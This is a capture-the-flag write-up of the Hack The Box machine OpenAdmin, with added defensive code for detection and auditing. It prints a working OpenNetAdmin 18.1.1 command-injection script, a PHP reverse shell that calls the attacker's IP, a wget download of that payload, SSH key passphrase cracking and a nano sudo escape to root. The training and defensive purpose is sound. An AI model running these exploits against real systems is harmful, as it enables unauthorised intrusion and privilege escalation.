
Hack The Box Write-Up OpenAdmin - 10.10.10.171


About OpenAdmin

In this post, I’m writing a write-up for the machine OpenAdmin from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

OpenAdmin is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises your points by 20.

Foothold

The Nmap scan found two open ports: 22/tcp and 80/tcp. By fuzzing the directories on the HTTP port, I found an OpenNetAdmin portal running version 18.1.1, which is out of date and contains a Remote Code Execution vulnerability. By exploiting this Remote Code Execution vulnerability in OpenNetAdmin, I get a reverse shell as the user www-data.

User

By searching the contents of the PHP files for the string passwd, I found a database password that gives me SSH access to this box, because the same password is used for the user account Jimmy. With the account of Jimmy, I have the privileges to access the directory /var/www/internal. This directory contains a file main.php which extracts the private key of the user Joanna. By requesting this file with curl through the port 52846/tcp, I captured the private key of Joanna. After cracking the passphrase of this key, I was able to SSH into this box with the user account Joanna.

Root

The privilege escalation to root is a very simple – and not realistic, IMO – escalation. The user account Joanna can run /bin/nano /opt/priv with root privileges without a password. Using GTFOBins, I was able to understand how to use this nano privilege to break out of the restricted area and gain root privileges.


Recon

Port scan with Nmap

I start with an Nmap port scan and write the output to openadmin.txt.

nmap -sC -sV -oA ./nmap/openadmin.txt 10.10.10.171

Results of the Nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 22:09 CET
Nmap scan report for 10.10.10.171
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

I have found two open ports on this box:

  1. 22/tcp (SSH)
  2. 80/tcp (Apache Web Server)

Enumeration

Web server

I started by enumerating the web server: I visited the page http://10.10.10.171 in my browser and landed on the Apache2 Ubuntu default page.


Nothing interesting here so far. I decided to use wfuzz as my first shot to try to find something interesting. I invoked this command.

wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404 http://10.10.10.171/FUZZ

Output:

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************             
* Wfuzz 2.4 - The Web Fuzzer                           *                                                                                      
********************************************************                                                                                      
Target: http://10.10.10.171/FUZZ                                       
Total requests: 949                
===================================================================                                                                           
ID           Response   Lines    Word     Chars       Payload                                                                                 
===================================================================                                                                           
000000544:   301        9 L      28 W     312 Ch      "music"   
Total time: 30.44644                                                   
Processed Requests: 949                                                
Filtered Requests: 948                                                 
Requests/sec.: 31.16948

wfuzz has found the folder music. I have now changed the URL in the web browser to http://10.10.10.171/music and a new webpage shows up.


On the top right corner, there is a login and register button. The register button points me directly back to the homepage, so that’s not interesting. The login button sends me to the URL: http://10.10.10.171/ona. That’s interesting to me. I clicked on the login button and I get redirected to a new webpage.


I’m now on an OpenNetAdmin page. On the left side of the page, there is an information bulletin visible. It says:

'You are NOT on the latest release version
     Your version    = v18.1.1
     Latest version = Unable to determine
 
 Please DOWNLOAD the latest version.'

That’s interesting information. When software is outdated, there is likely a vulnerability to exploit. I have got an initial foothold on the system.

Exploitation

Time to open the exploit-db. I invoked this command below, to search for an exploit that is applicable for this OpenNetAdmin software version.

searchsploit opennetadmin

The output.

----------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                       |  Path
                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                          | exploits/php/webapps/47691.sh
----------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is a known remote command execution vulnerability in OpenNetAdmin 18.1.1.

I tried to use this exploit in Metasploit, but that did not work. I have to use this exploit manually, without the help of Metasploit. I copied 47691.sh to my working directory.

cp /usr/share/exploitdb/exploits/php/webapps/47691.sh /home/htb/boxes/machines/openadmin/exploit

I performed a cat on the bash script 47691.sh to check what this script exactly is doing. This bash script has the following contents:

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

I need to specify the /ona/ URI to get this exploit working. I invoked this command and immediately ran ls:

./47691.sh 10.10.10.171/ona/
$ ls
config
config_dnld.php
dcm.php
images
include
index.php
local
login.php
logout.php
modules
plugins
winc
workspace_plugins

I now have a sort of shell. It is not a full shell, but I can execute some commands. I’m now running with the privileges of www-data.

$ whoami
www-data
$ pwd
/opt/ona/www
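
A defender-side check for the request shape used above, added here as an example (it is not part of the original write-up or of OpenNetAdmin). It assumes POST bodies are available from a WAF, reverse proxy or audit log, and that a benign request passes the address as `ip=>ADDRESS`; the function names and the sample traffic are constructed.

```python
import ipaddress
from urllib.parse import unquote_plus


def parse_form(body):
    """Split an urlencoded body on '&' only, so a raw ';' stays inside its value."""
    fields = []
    for field in body.split("&"):
        name, _, value = field.partition("=")
        fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def check_ona_request(body):
    """Return findings for one POST body; an empty list means nothing suspicious."""
    fields = parse_form(body)
    if ("xajax", "window_submit") not in fields:
        return []
    findings = []
    for name, value in fields:
        if name != "xajaxargs[]":
            continue
        key, sep, val = value.partition("=>")
        if sep and key == "ip":
            # Allowlist: the value must parse as an IP address, nothing else.
            try:
                ipaddress.ip_address(val.strip())
            except ValueError:
                findings.append("ip argument is not an IP address: %r" % val)
    return findings


def scan(requests):
    """requests: iterable of (client, path, body). Returns (client, finding) pairs."""
    alerts = []
    for client, path, body in requests:
        if "/ona" in path:
            alerts.extend((client, f) for f in check_ona_request(body))
    return alerts


# Constructed sample traffic. The second body has the shape that the 47691.sh
# script shown on this page sends, with "whoami" as the typed command.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "/ona/",
     "xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips"
     "&xajaxargs[]=ip%3D%3E192.0.2.77&xajaxargs[]=ping"),
    ("10.10.16.62", "/ona/",
     "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
     '&xajaxargs[]=ip%3D%3E;echo "BEGIN";whoami;echo "END"&xajaxargs[]=ping'),
]

if __name__ == "__main__":
    for client, finding in scan(SAMPLE_REQUESTS):
        print(client, finding)
```

Validating the argument against what it is supposed to be (an address) catches the injected command without keeping a list of shell metacharacters.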

Gaining Access

www-data

My Parrot OS machine has some default crafted reverse shells, from pentestmonkey, available. I copied the php-reverse-shell.php to my working directory:

cp /usr/share/webshells/php/php-reverse-shell.php .

To get this reverse shell working, it needs a little modification. The $ip needs to be changed to my machine IP, the $port needs to be modified, and I changed the file name to revshell.php, which is easier to write down.

$ip = '10.10.16.62';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

I need to drop the payload on the box. I used SimpleHTTPServer to transfer this payload to the box.

python -m SimpleHTTPServer 8000

On the box, I used the wget program to download the payload from my webserver to the remote machine.

wget 10.10.16.62:8000/revshell.php

I started netcat with a listener port of 4444 with this command:

~$ netcat -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Everything is now set up to get a remote shell on this webserver. I only need to call my revshell.php from the box. I opened the web browser and launched my reverse shell by opening this webpage: http://10.10.10.171/ona/revshell.php. The website loads the payload and keeps it running. This is visible from the fact that the web page stays in a loading state. The revshell.php is launching.


I’ve got a reverse shell. There is an incoming connection.

~$ ncat -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55110.
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 23:10:24 up 22 min,  7 users,  load average: 40.02, 32.64, 20.82
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/0    10.10.14.153     22:48   17:03   0.03s  0.03s -bash
jimmy    pts/1    10.10.15.81      22:48    4:56   0.06s  0.06s -bash
joanna   pts/2    10.10.14.190     23:02    3:35   0.03s  0.00s sshd: joanna [priv] 
joanna   pts/3    10.10.15.94      22:49    2:40   0.12s  0.00s sshd: joanna [priv] 
jimmy    pts/4    10.10.15.100     22:50    0.00s  0.04s  0.04s -bash
jimmy    pts/5    10.10.15.56      23:10    8.00s  0.02s  0.02s -bash
jimmy    pts/7    10.10.14.203     23:02    1:12   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

I now have a shell as www-data. First I need to upgrade this little puppy to a full shell. I invoked this command:

~$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@openadmin:/$

I now have a full shell on this server.

Lateral Movement

Getting to user account Jimmy

After some poking around in the shell, I found two user home directories /home/jimmy and /home/joanna but I do not have permission to access their folders.

The default location of the files for hosting a website is the /var/www folder. I decided to use this folder as my starting point to perform further enumeration to escalate to the user: cd /var/www and then ls -al. I see that the user account jimmy has access to the internal directory. There is also an html directory listed, and that will be my next stop.

www-data@openadmin:/var/www$ ls -al
ls -al
total 16
drwxr-xr-x  4 root     root     4096 Nov 22 18:15 .
drwxr-xr-x 14 root     root     4096 Nov 21 14:08 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Jan 16 18:39 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www
www-data@openadmin:/var/www/html$ ls
ls
artwork  index.html  marga  music  ona  sierra

There are some websites listed. I have visited all of the websites and checked if there was some interesting information:

  • http://10.10.10.171/artwork
  • http://10.10.10.171/marga
  • http://10.10.10.171/sierra

For now, there is nothing interesting to find on those websites. I’m looking for a password. These websites need configuration files with database connections. Usually, these configuration files have a .php extension. Maybe there is a password in some of these configuration files.

On further investigation, I see that the ona folder is pointing to another directory (some sort of hint?). This is noticeable and I will use this directory as root directory to speed up a further search with grep. I’ve tried some combinations of searches. And finally, I got a bite with the command below:

~$ grep -r --include="*.php" "passwd"
...
./include/adodb_sessions.inc.php: * does that sort of thing before it passes data to these functions.                                         
./config/auth_ldap.config.php://$conf['auth']['ldap']['bindpw']   = 'mysecretbindpassword';                                                   
./config/config.inc.php:// Think of it as a cache or an easy way to pass data around ;)                                                       
./dcm.php:// If no user name is passed in then use dcm.pl as the login name                                                                   
./dcm.php:// be careful as this currently does not require a password.                                                                        
./local/config/database_settings.inc.php:        'db_passwd' => 'n1nj4W4rri0R!',                                                              
./winc/display_domain_server.inc.php:    // It expects to be passed the domain name as domain= to the module                                  
./winc/app_plugin_list.inc.php://     call is made to display_list(), this time passing a search                                              
./winc/app_device_model_list.inc.php://     call is made to display_list(), this time passing a search                                        
./winc/display_domain.inc.php:    // extra stuff to pass to ws_plugins                                                                        
./winc/display_domain.inc.php:    // It expects to be passed the domain name as domain= to the module                                         
./winc/user_edit.inc.php:                    name="passwd"                                                                                    
./winc/user_edit.inc.php:                    type="password"                                                                                  
./winc/user_edit.inc.php:    if (!$form['id'] and !$form['passwd']) {    
...

I found the password n1nj4W4rri0R! I can now establish an SSH session with the user account jimmy in combination with this password.

~$ ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:

I know that the user account jimmy has access to the directory /var/www/internal. I navigate to this directory cd /var/www/internal and read the PHP-files. I found something interesting in the file main.php.

Last login: Thu Jan 16 21:04:55 2020 from 10.10.14.112
jimmy@openadmin:~$ pwd
/home/jimmy
jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -al
total 28
drwxrwx--- 2 jimmy internal 4096 Jan 16 20:41 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php
-rw-rw-r-- 1 jimmy jimmy    5492 Jan 16 19:28 php-reverse-shell.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

This is the interesting part: $output = shell_exec('cat /home/joanna/.ssh/id_rsa');. The result of this command is saved in $output and the output is printed on the screen. I can open this webpage with curl. I tried multiple times with curl to get some output, but received only 404 error messages.

With the command netstat --all I can see all the ports that this server is listening on, and I found something interesting.

Active Internet connections (servers and established)                                                                                         
Proto Recv-Q Send-Q Local Address           Foreign Address         State                                                                     
tcp        0      0 localhost:52846         0.0.0.0:*               LISTEN                                                                    
tcp        0      0 localhost:domain        0.0.0.0:*               LISTEN                                                                    
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN                                                                    
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN                                                                    
tcp        0      0 openadmin:47346         10.10.14.7:4444         ESTABLISHED                                                               
tcp        0      0 openadmin:ssh           10.10.14.36:33736       FIN_WAIT2                                                                 
tcp        0      0 openadmin:ssh           10.10.15.211:38424      TIME_WAIT                                                                 
tcp        0      0 openadmin:ssh           10.10.15.211:38422      TIME_WAIT     
...

This server is listening on a non-default port 52846. A quick search on Google shows me that there is no particular program using this port. It has been configured for some reason. I tried to use curl on this port from inside the box and this command was working for me, the output is an encrypted private RSA-key:

jimmy@openadmin: curl 127.0.0.1:52846/main.php                                                                                              
<pre>-----BEGIN RSA PRIVATE KEY-----                                                                                                          
Proc-Type: 4,ENCRYPTED                                                                                                                        
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
...
-----END RSA PRIVATE KEY-----
</pre><html>

I copied the key and pasted in a separate file on my localhost, I called the file id_rsa. Contents of this file:

-----BEGIN RSA PRIVATE KEY-----                                                                                                          
 Proc-Type: 4,ENCRYPTED                                                                                                                        
 DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
 ...
 -----END RSA PRIVATE KEY-----

From user account jimmy to joanna

I assume that this key is part of the password of the user account joanna. Let’s give this file to ssh2john, he is a hero in cracking these encrypted keys. I invoked this command and got this output:

~$ python ssh2john.py id_rsa
id_rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c82
...

I placed this hash in a separate file and called this file id_hash.txt. Then I gave this file to my big brother john:

john --wordlist=/usr/share/wordlists/rockyou.txt id_hash.txt

John has no problem cracking this password:

Using default input encoding: UTF-8 
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (?)
1g 0:00:00:11 DONE (2020-01-17 21:50) 0.08361g/s 1199Kp/s 1199Kc/s 1199KC/sa6_123..*7¡Vamos!
Session completed
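
John reports "0=MD5/AES" and an iteration count of 1 because the key is in the legacy PEM format (`Proc-Type: 4,ENCRYPTED` plus `DEK-Info`), where the encryption key comes from a single MD5 over the passphrase and salt. The following added example (not from the original write-up) classifies private key files by how the passphrase is protected, so weakly wrapped keys can be found and re-encrypted. The legacy sample reuses only the header lines shown on this page with a constructed body, the OpenSSH sample is a constructed header-only blob, and the rounds threshold is an assumption.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"
LEGACY_LABELS = {"RSA PRIVATE KEY", "DSA PRIVATE KEY", "EC PRIVATE KEY"}
MIN_BCRYPT_ROUNDS = 16  # assumption: ssh-keygen's default; raise it to suit your policy


def read_string(buf, off):
    """Read one SSH wire-format string (uint32 length + bytes) starting at off."""
    (n,) = struct.unpack_from(">I", buf, off)
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("truncated key header")
    return buf[off + 4:end], end


def report(fmt, cipher, kdf, rounds, finding):
    return {"format": fmt, "encrypted": kdf is not None, "cipher": cipher,
            "kdf": kdf, "rounds": rounds, "finding": finding}


def classify_private_key(text):
    """Report how (and how strongly) a passphrase protects a private key file."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if len(lines) < 3 or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM-armoured private key")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    body = lines[1:-1]

    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body))
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = read_string(blob, len(MAGIC))
        kdf, off = read_string(blob, off)
        opts, off = read_string(blob, off)
        if kdf == b"none":
            return report("openssh-key-v1", None, None, 0, "no passphrase")
        _salt, pos = read_string(opts, 0)          # kdfoptions = salt + rounds
        (rounds,) = struct.unpack_from(">I", opts, pos)
        finding = "ok" if rounds >= MIN_BCRYPT_ROUNDS else "bcrypt rounds below policy"
        return report("openssh-key-v1", cipher.decode(), kdf.decode(), rounds, finding)

    if label in LEGACY_LABELS:
        headers = dict(ln.split(": ", 1) for ln in body if ": " in ln)
        if headers.get("Proc-Type") == "4,ENCRYPTED":
            cipher = headers["DEK-Info"].split(",")[0]
            return report("legacy PEM", cipher, "MD5", 1,
                          "one MD5 call per passphrase guess; re-encrypt in the "
                          "OpenSSH format with bcrypt (ssh-keygen -p -o -a ROUNDS)")
        return report("legacy PEM", None, None, 0, "no passphrase")
    raise ValueError("unsupported key type: " + label)


def ssh_string(data):
    return struct.pack(">I", len(data)) + data


# Header lines as shown on this page; the base64 body is a constructed stub.
SAMPLE_LEGACY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

AAAA
-----END RSA PRIVATE KEY-----
"""

# Constructed openssh-key-v1 header only (zero salt, no key material).
HEADER = (MAGIC + ssh_string(b"aes256-ctr") + ssh_string(b"bcrypt")
          + ssh_string(ssh_string(b"\x00" * 16) + struct.pack(">I", 16))
          + struct.pack(">I", 1))
SAMPLE_OPENSSH = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(HEADER).decode()
                  + "\n-----END OPENSSH PRIVATE KEY-----\n")

if __name__ == "__main__":
    for sample in (SAMPLE_LEGACY, SAMPLE_OPENSSH):
        print(classify_private_key(sample))
```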

I now have the passphrase bloodninjas. Let’s try to create an SSH session.

~$ ssh joanna@10.10.10.171 -i id_rsa
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Jan 17 20:05:35 UTC 2020
  System load:  1.55              Processes:             180
  Usage of /:   49.0% of 7.81GB   Users logged in:       0
  Memory usage: 21%               IP address for ens160: 10.10.10.171
  Swap usage:   0%
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$

And I now have a shell for the user joanna!

joanna@openadmin:~$ ls
test.txt  user.txt
joanna@openadmin:~$ cat user.txt
c9b2cf07d40807e62af62660f0c81b5f
joanna@openadmin:~$

Got the user.txt!

Privilege Escalation

First, I checked which permissions joanna has:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Joanna may run /bin/nano in /opt/priv with root permissions without the need of a password. After some searching on Google, I found this page: https://gtfobins.github.io/gtfobins/nano/. It’s possible to perform a privilege escalation by editing a file as root without the need for the root password.

There is a file test.txt in this directory. I opened this file by invoking sudo /bin/nano /opt/priv and then performed a Read File (^R).

And then switch to Execute Command ^X and execute the command reset; sh 1>&0 2>&0.

And I’m root:

# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
2f907ed450b361b2c2bf4e8795d5b561
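
An audit check for the sudo rule that made this escalation possible, added here as an example (not part of the original write-up). It parses `sudo -l` output and flags rules that run an interactive editor or pager as root; the program list is an assumed, hand-picked subset of what GTFOBins documents, and the second sample is constructed.

```python
import re
from pathlib import PurePosixPath

# Assumption: a small subset of interactive programs that GTFOBins lists as
# able to spawn a shell or open other files once they are running.
INTERACTIVE = {"nano": "editor", "vi": "editor", "vim": "editor", "ed": "editor",
               "emacs": "editor", "less": "pager", "more": "pager", "man": "pager"}

ADVICE = {
    "editor": "grant 'sudoedit <file>' instead of running the editor as root",
    "pager": "drop the rule or expose the file another way; NOEXEC only "
             "blocks the shell escape, not opening other files",
}

# Matches rule lines such as "    (ALL) NOPASSWD: /bin/nano /opt/priv".
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")


def audit_sudo_l(output):
    """Return one finding per sudo rule that runs an interactive program as root."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines, headers, blank lines
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = PurePosixPath(cmd.split()[0]).name
            kind = INTERACTIVE.get(binary)
            if kind is None:
                continue
            findings.append({
                "command": cmd,
                "binary": binary,
                "kind": kind,
                "nopasswd": "NOPASSWD" in tags,
                "noexec": "NOEXEC" in tags,
                "advice": ADVICE[kind],
            })
    return findings


# The `sudo -l` output shown on this page.
SUDO_L_FROM_PAGE = r"""Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
"""

# Constructed second sample: one harmless rule and one pager rule on a line.
SUDO_L_CONSTRUCTED = """User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for sample in (SUDO_L_FROM_PAGE, SUDO_L_CONSTRUCTED):
        for f in audit_sudo_l(sample):
            print(f["command"], "->", f["advice"])
```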

Apply the flag and this box is rooted!

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.